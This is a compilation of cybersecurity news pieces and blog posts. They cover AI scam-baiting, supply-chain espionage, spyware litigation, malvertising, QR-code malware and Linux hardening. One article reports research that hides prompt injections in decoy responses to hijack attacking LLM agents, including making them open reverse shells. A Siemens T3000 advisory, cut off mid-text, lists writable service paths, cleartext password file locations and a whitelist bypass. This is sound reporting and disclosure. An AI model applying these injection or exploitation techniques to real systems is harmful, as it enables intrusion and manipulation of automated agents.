An Artificial Intelligence model called Daisy has been deployed to waste phone scammers' time so they can't defraud real people.

A mobile network operator has called in the help of Artificial Intelligence (AI) in the battle against phone scammers.

Virgin Media O2 in the UK has built an AI persona called Daisy with the sole purpose of keeping scammers occupied for as long as possible. Basically, until the scammers give up, because Daisy won’t.

Daisy uses several AI models that work together listening to what scammers have to say, and then responding in a lifelike manner to give the scammers the idea they are working on an “easy” target. Playing on the scammers’ biases about older people, Daisy usually acts as a chatty granny.

According to Virgin Media O2’s press release Daisy has successfully kept numerous fraudsters on calls for 40 minutes at a time. To achieve this “Granny Daisy” will tell the scammers all about her passion for knitting, her cat Fluffy, and provide exasperated callers with false personal information including made up bank details.

The idea behind Daisy is two-fold. Not only does it waste the scammers’ time—time they could have spent defrauding real people—but it also raises awareness, through posts such as this one, that the person you are talking to on the phone could be very different from what you imagine.

Raising awareness about how AI can be used to deceive people is necessary: We’ve reported about how scammers have used AI used to fake voices of loved ones in a “I’ve been in an accident” scam to warn others about the scam.

Virgin Media O2 research learned that 67% of Brits are concerned about being the target of fraud and 22% experience a fraud attempt every single week. The Federal Trade Commission (FTC) received fraud reports from 2.6 million consumers in 2023, with imposter scams the most commonly reported fraud category.

The criminals often pretend to work for your bank or a delivery company that needs a payment before they can deliver a package, with the end goal of the victim disclosing their banking details.

It’s too bad that Daisy can’t intercept the calls from the scammers. For now, the scammers will have to call one of the phone numbers that Daisy answers, which have cleverly been circulated on contact lists known to be used by scammers.

If you’d like to hear Daisy in action here is a video with some actual audio.

Daisy was set up with the help of one of YouTube’s best known scam baiters, Jim Browning. Behind the scenes there are several people that enjoy being a real life time waster, but they can only occupy so many because their time is limited.

We asked Tammy Stewart, one of Malwarebytes’ researchers, who has made it a hobby to waste the time of phishers herself, and she was enthusiastic about the idea of having a “Daisy.” In fact, she’d like to have several and she thinks they could be very effective.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 AI Granny Daisy takes up scammers’ time so they can’t bother you 

Recent backdoor implants and cyber-espionage attacks on their supply chains have African organizations looking to diversify beyond Chinese, American tech vendors.

Source: CG Alex via Shutterstock

Every night for five years, computers and network appliances from the headquarters of the African Union in Ethiopia — a facility built by Chinese firms — reportedly reached out to China-based systems and uploaded sensitive data. The espionage through the technology supply chain, which China's government denies, undermined the security of the pan-African organization.

The incident and more recent supply-chain breaches have underscored that reliance on foreign technological supply chains carries with it significant risks. While using a technology supply chain anchored in China was seen as a less constrained option than US and European options, the truth is that African nations need to evaluate the security of all their supply chains across applications, consumer devices, infrastructure, and service providers, according to a report published by the Africa Center for Strategic Studies, a research and academic center funded by the US Department of Defense.

"I don't think there's an African country that doesn't have some kind of interest in fostering a more robust technology industry and finding various ways to exert more ownership and agency over various aspects of the technology sector," says Nate Allen, associate professor at the Africa Center for Strategic Studies and the author of the report. "You are seeing increasing African interest in having more ownership and say over their technology supply chains."

Supply-chain security has become a major issue worldwide following malicious events, such as the WannaCry and NotPetya worms and the compromise of SolarWinds, as well as IT supply-chain failures, like this summer's CrowdStrike outage. The US government has voiced concerns over the extent to which US maritime ports are reliant on Chinese equipment and investment, and China has begun creating its own operating system and software ecosystem.

Similarly, African nations have become wary of information technology supplied by any number of foreign countries, including China, Russia, the US, and Europe. While African nations need the technology and investment, they are pursuing initiatives to reduce their reliance, says Mark Walker, vice president of data and analytics for the Middle East, Turkey, and Africa for IDC South Africa.

"The reality is that we live in a multidimensional, globally interconnected world, \[where\] development is reliant on significant capital investment and R&D to develop technology — often this is in limited supply across Africa," he says. "That said, many African nations are focusing on developing local software and technology skills in their populations to offset reliance on global players and also ensure that solutions are relevant to local market condition and needs. Education plays a significant role in this."

**China, US Dominate Africa's Tech Market**

Those efforts are still nascent, with the reality that the top technology suppliers in Africa come from China and the US. In mobile applications, for example, 36 of 2023's top-100 applications are from Chinese companies, while 23 are from US companies, according to a report from DataSparkle, a provider of data and analytics for emerging markets. Africa-based developers only account for only seven applications, mostly focused on digital cash and payment applications.

The US dominates the operating-system supply chain with Microsoft's Windows, Google's Android, and Apple's iOS dominating the field.

"If you're not China and you're not the United States, you just have a lot of dependencies in your technology supply chain, and there's no way around it — even to some extent, if you are China and the United States," ACSS's Allen says.

Yet, the 54 nations on the content have options. While foreign firms provide much of the technology, the African market continues to grow and the domestic technology sector continues to have the most insight into nation-by-nation needs.

"\[A\] detailed view of Africa’s technology sector reveals that it is not under the control of any one actor, and there are plenty of opportunities for Africans to assert agency," the ACSS report stated. "By further fostering diversity and competition within the tech sector, African governments can help mitigate the vulnerabilities that come from external actor influence."

**Future of Technology Supply Chains in Africa**

Companies entering the market should find ways to address the cybersecurity concerns of African customers, because if they don't, someone else will, says IDC South Africa's Walker.

"Competition is strong, and vendors are judged on their ability to supply relevant technologies and services at a fair price with solid \[local\] support structures," he says, adding that companies should understand "the local market dynamics, including economic and political realities and the local regulatory environments. Security issues faced in the Horn of Africa around Somalia are different to those faced in northern Nigeria and the Magreb, which again, differ significantly from southeast Africa."

Among incidents in Africa, Chinese hackers targeted Kenyan officials following the nation's trouble paying back loans from China, according to news reports published in 2023, while another incident involved a state-sponsored group targeting foreign-affairs ministries, embassies, and military forces in Africa in an operation dubbed Diplomatic Specter, according to a threat analysis published in May.

In addition, African officials have warned that an important technology supply chain for the continent — open-source software (OSS) — needs to be better secured to prevent malicious attacks.

"I don't think that Africans are naive, or any government around the world is naive — I think they know that, if you are being sold a technology product that is not domestically produced, then there's always going to be some kind of security risk there," says ACSS's Allen. "I think the question is, how can you mitigate that security risk?"

Companies working in the markets need to have an answer to that question, he says.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

African Reliance on Foreign Suppliers Boosts Insecurity Concerns

Apple has released security updates for iOS, iPadOS, macOS, visionOS, and its Safari web browser to address two zero-day flaws that have come under active exploitation in the wild.
The flaws are listed below -

CVE-2024-44308 - A vulnerability in JavaScriptCore that could lead to arbitrary code execution when processing malicious web content
CVE-2024-44309 - A cookie management vulnerability in

Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities

Our security teams work around the clock to help protect every person and organization on the planet from security threats. We also know that security is a team sport, and that’s why we also partner with the global security community through our bug bounty programs to proactively identify and mitigate potential issues before our customers are impacted.

Our security teams work around the clock to help protect every person and organization on the planet from security threats. We also know that security is a team sport, and that’s why we also partner with the global security community through our bug bounty programs to proactively identify and mitigate potential issues before our customers are impacted. Unique perspectives from the brightest security minds add another layer to our overall strategy to protect our ecosystem. By incentivizing high-impact research, we raise the security bar for everyone.  

Today, we are building on that history of partnership and expanding our bug bounty programs with the Zero Day Quest. This new hacking event will be the largest of its kind, with an additional $4 million in potential awards for research into high-impact areas, specifically cloud and AI. Zero Day Quest will provide new opportunities for the security community to work hand in hand with Microsoft engineers and security researchers – bringing together the best minds in security to share, learn, and build community as we work to keep everyone safe.  

The quest begins today with a research challenge, where vulnerability submissions within targeted scenarios during the event are eligible for multiplied bounty awards. Submissions can also qualify researchers for a spot in the onsite hacking event in Redmond, WA, in 2025.  

To advance AI security, starting today we will offer double AI bounty awards. We will also offer researchers direct access to the Microsoft AI engineers focused on developing secure AI solutions, and our AI Red Team. This unique opportunity will allow participants to enhance their skills with cutting-edge tools and techniques and work with Microsoft to raise the bar for AI security across the ecosystem – making everyone safer. Register for a training session with the Microsoft AI Red Team today.  

In alignment with our Coordinated Vulnerability Disclosure (CVD) approach, researchers will be encouraged to publicly discuss their findings once mitigated, with support from Microsoft through blogs, podcasts, and videos to ensure we can all learn and build on this work. As part of our Secure Future Initiative (SFI), we will transparently share critical vulnerabilities through the Common Vulnerabilities and Exposures (CVE) program, even if they require no customer action. Learnings from the Zero Day Quest will be shared across Microsoft to help improve cloud and AI security - by default, by design, and in operations.  

This event is not just about finding vulnerabilities; it’s about fostering new and deepening existing partnerships between the Microsoft Security Response Center (MSRC), product teams, and external researchers – raising the security bar for all. Join us in this exciting journey as we push the boundaries of cybersecurity and work together to create a safer digital world.

_Tom Gallagher_  
_VP of Engineering, Microsoft Security Response Center (MSRC)_

Securing AI and Cloud with the Zero Day Quest

Freshly released court documents reveal new details on controversial Israeli spyware firm's operations.

Source: Shubham singh 007 via Shutterstock

Israel's NSO Group may know a lot more about how customers use its Pegasus commercial spyware product than the company has let on, newly released court documents connected to a legal dispute with Meta's WhatsApp suggest.

In fact, NSO Group installed and operated the spyware on behalf of its customers, making the company directly liable for the spyware's use, WhatsApp lawyers said in one court filing, released Nov. 14 in the US District Court for the Northern District of California.

The court documents are part of a lawsuit that WhatsApp filed against NSO Group in October 2019 after discovering the Israeli firm had used WhatsApp servers to distribute Pegasus to some 1,400 mobile phones, including those belonging to journalists and rights activists.

The lawyers also claimed that NSO Group repeatedly developed and used exploits for abusing WhatsApp's servers to install Pegasus on target devices, including at least once after WhatsApp had sued the company over the issue.

**NSO 'Solely Responsible'**

"NSO is solely responsible for Pegasus’s unauthorized access to WhatsApp's servers," the social media giant noted in one briefing. "Despite what NSO has claimed, its customers had a minimal role in how the spyware tool operated or collected information. All that NSO Group customers typically had to do was enter their target's phone number, press install and wait for the malware to install on the target device without any further interaction," they noted.

Related:Trustwave-Cybereason Merger Boosts MDR Portfolio

"In other words, the customer simply places an order for a target device's data, and NSO controls every aspect of the data retrieval and delivery process through its design of Pegasus," WhatsApp's lawyers said. The company, in fact, was so aware of how customers were using its malware that it actually disconnected service to 10 customers for excessive abuse, the lawyers claimed.

**Controversial Surveillance Software**

Pegasus is a controversial mobile spyware designed to secretly monitor and extract data from iOS and Android smartphones. Once installed, Pegasus can intercept messages, emails, media, and passwords, and track location data, all while evading detection by antivirus software. NSO Group claims to sell the technology solely to authorized government agencies for legitimate law enforcement, crime-fighting, and anti-terror purposes. But critics argue that the tool has been misused, particularly in authoritarian regimes, to target journalists, human rights activists, political dissidents, and others critical of the government.  

Related:Xiphera & Crypto Quantique Announce Partnership

A 2021 database leak revealed that NSO Group customers had, at the time, targeted more than 50,000 phone numbers for surveillance in countries like Mexico, Hungary, and India. The US government formally blacklisted the company in 2021, meaning its ability to operate in the US or do business with US entities abroad is severely restricted.

The NSO Group has tried to get US courts to dismiss WhatsApp's lawsuit against the company, citing, among other things, a lack of jurisdiction and the fact that its clients are mostly governments and therefore are not doing anything illegal. WhatsApp lawyers have sought to portray NSO Group as indeed being liable for Pegasus by attempting to tie the vendor more directly to customer use of the spyware tool.

In the newly released court documents, WhatsApp has alleged that NSO Group repeatedly and deliberated worked around the mechanisms the company put in place to prevent misuse of the secure messaging platform. One of them was a modified WhatsApp client app called the WhatsApp Installation Server (WIS) that could access WhatsApp's back-end servers in ways its own client software could not. NSO Group then developed tools named Heaven and Eden to interact with WIS in such a way as to trigger Pegasus downloads on target phones via WhatsApp. The company developed Eden after WhatsApp discovered Heaven and put up blocks against it. When WhatsApp engineers discovered Eden, NSO developed and used yet another tool, called Erised, through 2020, or after WhatsApp had filed its lawsuit.

Related:North Korea's Andariel Pivots to 'Play' Ransomware Games

The WhatsApp lawsuit is one of several that NSO Group is currently battling in courts worldwide from organizations and individuals impacted by the malware. In September, Apple sought voluntary dismissal of a 2021 lawsuit it had filed against NSO Group, citing concerns over the company having to share information with the court that other spyware makers could abuse going forward.

Back when the lawsuit was filed, the NSO Group was among a handful of known purveyors of such mobile spyware software. Since then, there has been a sharp increase in the number of commercial spyware vendors, driven largely by demand from government agencies. A Google report earlier this year identified spyware vendors like NSO Group as being responsible for nearly half of all zero-day exploits it counted between mid-2014 and December 2023.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

WhatsApp: NSO Group Operates Pegasus Spyware for Customers

Experimental counter-offensive system responds to malicious AI probes with their own surreptitious prompt-injection commands.

Source: Valentin Baciu via Shutterstock

Companies worried about cyberattackers using large-language models (LLMs) and other generative AI systems that automatically scan and exploit their systems could gain a new defensive ally — a system capable of subverting the attacking AI.

Dubbed Mantis, the defensive system uses deceptive techniques to emulate targeted services and — when it detects a possible automated attacker — sends back a payload that contains a prompt-injection attack. The counterattack can be made invisible to a human attacker sitting at a terminal and will not affect legitimate visitors who are not using malicious LLMs, according to the paper penned by a group of researchers from George Mason University.

Because LLMs used in penetration testing are singularly focused on exploiting targets, they are easily co-opted, says Evgenios Kornaropoulos, an assistant professor of computer science at GMU and one of the authors of the paper.

"As long as the LLM believes that it's really close to acquiring the target, it will keep trying on the same loop," he says. "So essentially, we are kind of exploiting this vulnerability — this greedy approach — that LLMs take during these penetration-testing scenarios."

Cybersecurity researchers and AI engineers have proposed a variety of novel ways for LLMs to be used by attackers. From the ConfusedPilot attack, which uses indirect prompt injection to attack LLMs when they are ingesting documents during retrieval-augmented generation (RAG) applications, to the CodeBreaker attack, which causes code-generating LLMs to suggest insecure code, attackers have automated systems in their sights.

Yet, research on offensive and defensive uses of LLMs is still early: AI-augmented attacks are essentially automating the attacks that we already know about, says Dan Grant, principal data scientist at threat-defense firm GreyNoise Intelligence. Yet, signs of increasing use of automation among attackers is increasing: the volume of attacks has been slowly increasing in the wild and the time to exploit a vulnerability has been slowly decreasing.

"LLMs enable an extra layer of automation and discovery that we haven't really seen before, but \[attackers are\] still applying the same route to an attack," he says. "If you're doing a SQL injection, it's still a SQL injection whether an LLM wrote it or human wrote it. But what it is, is a force multiplier."

**Direct Attacks, Indirect Injections, and Triggers**

In their research, the GMU team created a game between an attacking LLM and a defending system, Mantis, to see if prompt injection could impact the attacker. Prompt injection attacks typically take two forms. Direct prompt injection attacks are natural-language commands that are entered directly into the LLM interface, such as a chatbot or a request sent to an API interface. Indirect prompt injection attacks are statements included in documents, web pages, or databases that are ingested by an LLM, such as when an LLM scans data as part of a retrieval-augmented generation (RAG) capability.

In the GMU research, the attacking LLM attempts to compromise a machine and deliver specific payloads as part of its goal, while the defending system aims to prevent the attacker's success. An attacking system will typically use an iterative loop that assesses the current state of the environment, selects an action to advance toward its goal, execute the action, and analyze the targeted system's response.

Using a decoy FTP server, Mantis sends a prompt-injection attack back to the LLM agent. Source: "Hacking Back the AI-Hacker" paper, George Mason University

The GMU researchers' approach is to target the last step by embedding prompt-injection commands in the response sent to the attacking AI. By allowing the attacker to gain initial access to a decoy service, such as a web login page or a fake FTP server, the group can send back a payload with text that contains instructions to any LLM taking part in the attack.

"By strategically embedding prompt injections into system responses, Mantis influences and misdirects LLM-based agents, disrupting their attack strategies," the researchers stated in their paper. "Once deployed, Mantis operates autonomously, orchestrating countermeasures based on the nature of detected interactions."

Because the attacking AI is analyzing the responses, a communications channel is created between the defender and the attacker, the researchers stated. Since the defender controls the communications, they can essentially attempt to exploit weaknesses in the attacker's LLM.

**Counter Attack, Passive Defense**

The Mantis team focused on two types of defensive actions: Passive defenses that attempt to slow the attacker down and raise the cost of their actions, and active defenses that hack back and aim to gain the ability to run commands on the attacker's system. Both strategies were effective with a greater than 95% success rate using the prompt-injection approach, the paper stated.

In fact, the researchers were surprised at how quickly they could redirect an attacking LLM, either causing it to consume resources or even to open a reverse shell back to the defender, says Dario Pasquini, a researcher at GMU and the lead author of the paper.

"It was very, very easy for us to steer the LLM to do what we wanted," he says. "Usually, in a normal setting, prompt injection is a little bit more difficult, but here — I guess because the task that the agent has to perform is very complicated — any kind of injection of prompt, such as suggesting that the LLM do something else, is \[effective\]."

By bracketing a command to the LLM with ANSI characters that hide the prompt text from the terminal, the attack can happen without the knowledge of a human attacker.

**Prompt Injection is the Weakness**

While attackers who want to shore up the resilience of their LLMs can attempt to harden their systems against exploits, the actual weakness is the ability to inject commands into prompts, which is a hard problem to solve, says Giuseppe Ateniese, a professor of cybersecurity engineering at George Mason University.

"We are exploiting those something that is very hard to patch," he says. "The only way to solve it for now is to put some human in the loop, but if you put the human in the loop, then what is the purpose of the LLM in the first place?"

In the end, as long as prompt-injection attacks continue to be effective, Mantis will still be able to turn attacking AIs into prey.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI About-Face: 'Mantis' Turns LLM Attackers Into Prey

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing malicious Chrome browser extensions.

Cybersecurity researchers at Bitdefender have uncovered a malicious advertising (malvertising) campaign that exploits **Meta’s advertising platform** to distribute malware on Facebook. This campaign, detected on November 3, 2024, disguises the malware as a security update for the popular **Bitwarden password manager**. Although the campaign has been taken down, experts warn that similar threats are likely to resurface.

****From Malicious Facebook Ads to Fake Chrome Store****

The campaign uses **deceptive Facebook ads** that appear to be legitimate security updates for Bitwarden. These ads warn users about the risk of compromised passwords and trick them into installing an urgent security update for the password manager. The ads are designed to look authentic, using Bitwarden’s branding and language to create a sense of urgency.

When users click on these ads, they are redirected through a series of websites before reaching a phishing page that mimics the official Chrome Web Store. This final page notifies users to install a **malicious browser extension** disguised as a Bitwarden update. The installation process involves downloading a zip file from Google Drive, unzipping it, and manually loading the extension into the browser.

According to Bitdefender’s **blog post** shared with Hackead.com heard of its publishing on Monday, once installed, the malicious Chrome extension requests permissions, enabling it to intercept and exploit the user’s online activities.

Some key permissions requested include access to all websites, modification of network requests, and access to storage and cookies. The extension’s manifest file reveals these permissions, indicating its ability to perform various malicious activities.

Researchers noted that the core of the attack lies within the background.js script, which activates upon installation. This script performs several critical tasks data exfiltration which the collected data is sent to a Google Script URL acting as a command-and-control server, cookie harvesting which allows attackers to search for Facebook cookies, particularly the c_user cookie containing the user’s Facebook ID. The script also gathers IP address and geolocation data and extracts personal and business information from Facebook using the Graph API.

Malicious Facebook ads (left) – Malicious Chrome extension (right) – Screenshot via Bitdefender

****Impacted Users****

The malware’s primary targets are Facebook business accounts putting unsuspected individuals and organizations at risk. The malvertising campaign has already reached thousands of users, primarily in Europe, with the possibility to expand globally.

If you use Facebook for business purposes and manage a business account, it’s important to stay cautious. If you come across a malicious ad prompting you to install updates, avoid clicking on it. Instead, visit the official website of the product to verify and access legitimate security updates.

1.  Fake Ads Manager Software Target Facebook Accounts
2.  Fake LastPass Password Manager App Lurks on iOS App Store
3.  Fake League of Legends Download Ads Spread Lumma Stealer
4.  PasswordState password manager’s update hijacked to drop malware
5.  Fake Meta Ads Hijack Facebook Accounts to Spread SYS01 Infostealer

Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden

A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

Physical letters that contain a QR code to trick people into downloading malware are being sent through the mail, according to a warning issued by The Swiss National Cyber Security Centre (NCSC).

The letters are sent as if they come from the official Swiss Federal Office of Meteorology and Climatology (MeteoSwiss) and they urge the recipient to install a new “severe weather app.”

This app, however, does not exist, and the letters do not come from MeteoSwiss either.

Scanning the QR code in the malicious letters leads to a banking Trojan known as Coper, but also referred to as Octo2. Coper is a Malware-as-a-Service which “customers” can spread as they see fit, but they pay for the use of the malicious software and the underlying infrastructure. These customers are running campaigns targeting Europe, the US, Canada, the Middle East, Singapore, and Australia.

Coper is a sophisticated banking Trojan that has several advanced features:

*   Device Takeover (DTO) capabilities for remote control
*   Advanced obfuscation techniques to avoid detection
*   Overlay attacks aimed at credential theft

The fake “meteorology app” for this malware campaign is disguised under the name “AlertSwiss” when installed on Android devices, but Coper cybercriminals can customize these names for all other campaigns. That adaptability makes for a more convincing lure depending on which country or region is being targeted. For instance, “AlertSwiss” is a clear attempt to fake the name of an official app from the Federal Office for Civil Protection which is used by federal and cantonal agencies to inform, warn, and alert the population. That real app’s name is “Alertswiss” (note the tiny difference).

Using QR codes in snail mail offers the criminals a few advantages. People may not expect to end up with their device infected by something as non-technical as a physical letter. And QR codes get typically read by mobile devices, which—unfortunately—still get overlooked when it comes to installing security software.

QR codes are becoming more common, especially after the COVID-19 pandemic which pushed many restaurants into using digital menus instead of physical menus that are shared between customers (in the earliest days of COVID lockdowns, science was still emerging on the risk levels of touching shared objects). Because of so much change in the past few years, seeing a QR code in a letter from an official institution does not trigger any alarm bells anymore.

And many Android users suffer from either a “patch gap” or are even using Android versions that are no longer supported, so will never receive another security update. One of the main causes for a patch gap is the time it takes a fix for a known vulnerability to trickle down from software vendor to individual device manufacturers, which then need to make it available for the users.

**Security advice**

*   Keeping your device up to date protects you from known vulnerabilities and helps you to stay safe.

We have found that many users have no idea whether their devices are still receiving updates. You can find your device’s Android version number, security update level, and Google Play system level in your Settings app. You’ll get notifications when updates are available for you, but you can also check for them yourself.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

*   Scan a QR code with the same security mindset as clicking a link

If you scan a QR code, make sure to use an app that shows you the full URL and asks you first before it visits the URL encoded in the QR code. If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. Modern Android devices (version 8 and above) have a native QR code scanning capability built into the camera app. Some QR code scanner apps may have a feature that automatically executes actions like opening a website or downloading a file. Disable such features.

*   Use anti-malware protection on your devices

Your mobile devices are in need of protection just as much as your computer. Malwarebytes offers customers Malwarebytes for Android and Malwarebytes for iOS. Malwarebytes detects Coper as Android/Trojan.Banker.Ink.a.

 Malicious QR codes sent in the mail deliver malware 

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more se

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.

Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.

Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more secure.

In this article, we explore some of the tools included in RHEL that will help you start hardening your systems to better prevent access to files, processes and applications.

****Implementing access control with SELinux****

Many RHEL customers and users have experienced issues when trying to run custom applications, operating on standard folders and locations of common processes, or even just trying to open ports for their web services.

In 99% of these cases, the "issues" were caused by Security-Enhanced Linux (SELinux).

SELinux comes enabled by default in RHEL and it is a security framework that helps system administrators implement Mandatory Access Control (MAC) instead of Discretionary Access Control (DAC). MAC takes into account access modes, groups and users that can operate on files, folders and applications. Additionally, it implements a complex set of access rules, based on labels and types, that uniquely identify which processes can access specific files, folders and ports.

****MAC example****

Let's look at httpd as an example:

*   Httpd runs with a default SELinux type of **httpd\_d**
*   The folder /var/www/html/ has **httpd\_sys\_content\_t**
*   SELinux expects the process to access specific ports (80, 443, 8080, 8443 among others) and has assigned those ports a specific label, **http\_port\_t**

Suppose we try to run httpd with a different folder (i.e. /var/www/my\_site) and a different port (i.e. 4449). When we try to start the httpd service, SELinux will prevent it until we manually add the new folder and the chosen port to the labels mentioned above.

Rules for most of the applications and processes that are shipped with RHEL are already established, but they can be customized and extended to match your needs, so you can adapt them to custom applications.

Out of the box, RHEL offers a dedicated system role for Ansible that will simplify and automate the operations involving SELinux labeling and verification.

****Preventing non-standard applications from running in your environment with fapolicyd****

With SELinux we can control how processes can access files, folders and ports, but what if we want to make sure that only what comes with the RHEL can be executed?

fapolicyd is a lightweight security framework that includes a daemon whose role is to make sure that only applications that are installed as trusted RPMs can be executed.

This is possible because fapolicyd uses a specific database and a set of rules that keeps track of packages and their content that are installed using the package manager (and are present in the RPM database), so those, and only those, can be executed.

With fapolicyd installed and running in your RHEL machine, trying to create and run a Bash script or move and run the default applications present in the /usr/bin or /bin folders elsewhere in the system will result with a permission denied error.

Similar to SELinux, fapolicyd comes with a set of predefined rules that can be easily extended to match your operative requirements, also covering rules for scripts, MIME types and more.

By default, fapolicyd operates on byte size of the executable, but it can also support integrity checking.  This means that even if an attacker manages to replace an executable with a malicious version that's the same size, fapolicyd can still prevent it from running.

This is crucial when it comes to preventing unwanted applications such as rootkits, malware or any other harmful executables from running and disrupting your system.

****Intrusion detection made simple - AIDE, IMA and EVM****

One of the most common attack vectors is when existing files and processes are altered to inject malicious code or configurations, making the system vulnerable to attacks or exploits.

Advanced Intrusion Detection Environment (AIDE) is a tool, included in RHEL, that enables integrity checks for the whole system, maintaining an updated database of all files and folders to track any added or removed files, location changes or other suspicious activity.

The database can be updated using a cron job, so it is always up-to-date and aligned with the current system status.

RHEL also supports a lower-level Integrity Measurement Architecture (IMA) that is implemented at kernel level. This supports creating and maintaining hashes of all local files, and can implement a runtime check using a kernel hook to prevent executing and/or accessing files that have been altered or have failed verification checks.

If used in combination with the Extended Verification Module (EVM) kernel module, the kernel can also perform checks on the extended attributes of files, drastically reducing the chances that any modification performed by a malicious entity can compromise the integrity of the system.

****Wrap up****

The tools we discussed here are just some of the utilities and frameworks that RHEL includes to improve system security and integrity.

In a previous article, we also covered how Red Hat Insights, the SaaS (Software as a Service) solution hosted on Red Hat Console can be used to detect malware in systems.

Please don’t hesitate to contact us if you would like to learn more!

****Further reading****

*   Enhancing security with the Kernel integrity subsystem
*   RHEL Security hardening

Hardening your operating system? Red Hat Enterprise Linux to the rescue!

Siemens Energy Omnivise T3000 version 8.2 SP3 suffers from local privilege escalation, cleartext storage of passwords in configuration and log files, file system access allowing for arbitrary file download, and IP whitelist bypass.

    SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >=======================================================================              title: Multiple vulnerabilities            product: Siemens Energy Omnivise T3000 vulnerable version: >=8.2 SP3      fixed version: see solution section         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879             impact: High           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html              found: 2024-06-02                 by: Steffen Robertz (Office Vienna)                     Andreas Kolbeck (Office Munich)                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"Located in 90 countries, Siemens Energy operates across the whole energy landscape.From conventional to renewable power, from grid technology to storage to electrifyingcomplex industrial processes.Our mission is to support companies and countries with what they need to reducegreenhouse gas emissions and make energy reliable, affordable, and more sustainable.Let’s energize society."Source: https://www.siemens-energy.com/global/en/home/company/about.htmlBusiness recommendation:------------------------Siemens has released their security advisory SSA-857368, see the following URLfor further details:https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-sectionFollow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089and SE Controls Security Announcement 2024-01.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)Insecurely configured services or the insecure configuration of their authorizationslead to privilege escalation vulnerabilities in the Windows operating system. It ispossible for a low-privileged user to modify a service in such a way that it executesarbitrary code instead of starting the actual service. The service path is writable bythe "Authenticated Users" group.Precondition for exploitation: requires authenticated local access to the Terminal Serverof the T3000 system.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered. These can be usedto jump from host to host and thus compromise the whole security architecture ofthe T3000 system.Precondition for exploitation: requires administrative local access to any server of theT3000 system.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView application is a web application hosted on the applicationserver. One parameter accepts a full path, which can be abused to download arbitraryfiles.Precondition for exploitation: requires administrative remote access to the Applicationserver of the T3000 system.4) IP Whitelist Bypass (CVE-2024-38879)The application server is hosting the T3000 web application on port 8080. However,only the Terminal Server is whitelisted. This whitelisting can be circumvented byexploiting the additionally exposed Tomcat AJP service on port 8009.Precondition for exploitation: requires unauthenticated remote access to the Applicationserver of the T3000 systemProof of concept:-----------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)The following path hosts a file that is used by the "DSGW Service" of the T3000 system:"E:\dsgw\gw\bin\dsgwservice.exe"The path is writable by the "Authenticated Users" group.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered.Terminal Server:* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)Application Server:* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)All Servers:All servers are being deployed via Puppet. However, the cache file is nevercleared and contains the initial passwords of all systems of the T3000 system:"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"---------------------------------------[...]"parameters": {"foreman_pass": "[redacted]","foreman_url": "[redacted]","foreman_user": "puppet_provider","is_sec": "true","mpssvc_pass": "[redacted]"}[...]"parameters": {"crsphost": 